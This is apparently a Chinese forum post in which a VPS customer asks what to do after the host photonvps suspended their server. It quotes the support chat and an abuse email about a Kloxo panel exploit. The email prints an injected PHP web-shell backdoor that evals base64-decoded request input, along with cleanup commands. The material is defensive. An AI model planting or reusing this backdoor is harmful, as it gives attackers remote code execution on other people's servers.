|
过年回家,photonvps 停了我的VPS,现在死不肯开通,都不知怎办,VPS上,过年前网站的数据也没有备份,现在想叫开通后备份下,下面为对话,现怎办呢?
photonvps
This is a easy fix give me the credentials ill fix it for you.
我
I now know is the VPS control panel of a loophole, but now I cannot link to repair, also want to put the site data backup, backup and then reinstall the VPS, in the control panel, can you help me to open the VPS, let me make this operation?
photonvps
You are not reading the emails we sent you that your kloxo has an exploit that we needed you to clean it? I am sorry but if you ignore us we wont be able to help you with these type of abuse.
Your kloxo has an exploit you needed to clean it but you ignore us so we suspended you to stop attacks from your VM. If you want us to help you give us your server credentials, otherwise we are going to terminate this account.
我
photonvps
Hello,
You account has been suspended because you did not respond to the abuse ticket within 24 hours.
Thank you.
Hello,
This is abuse department sending you an important email alert of a backdoor botnet exploit with your kloxo panel that needs fixing ASAP!
This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.
Fortunately this exploit can be fixed by following the instructions listed below.
Find files that were modified on the 27th ot this month.
find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"
You should get something similar to this
/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php
the defuzx.php, and emptzx.php files were uploaded, and are the exploit that needs deleting.
You can check inspect the backdoor code that was injected by the hacker to gain access to your account.
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
To remove the exploit we do
rm -fr /home/kloxo/httpd/default/emptzx.php
rm -fr /home/kloxo/httpd/default/defuzx.php
make sure to only delete the files that were modified on the 27. the default.php file change due to the kloxo being hack so to fix that we need to update kloxo and change the admin password.
Update kloxo “/scripts/upcp”
Then finalize the fix by changing your kloxo admin panel password. |
|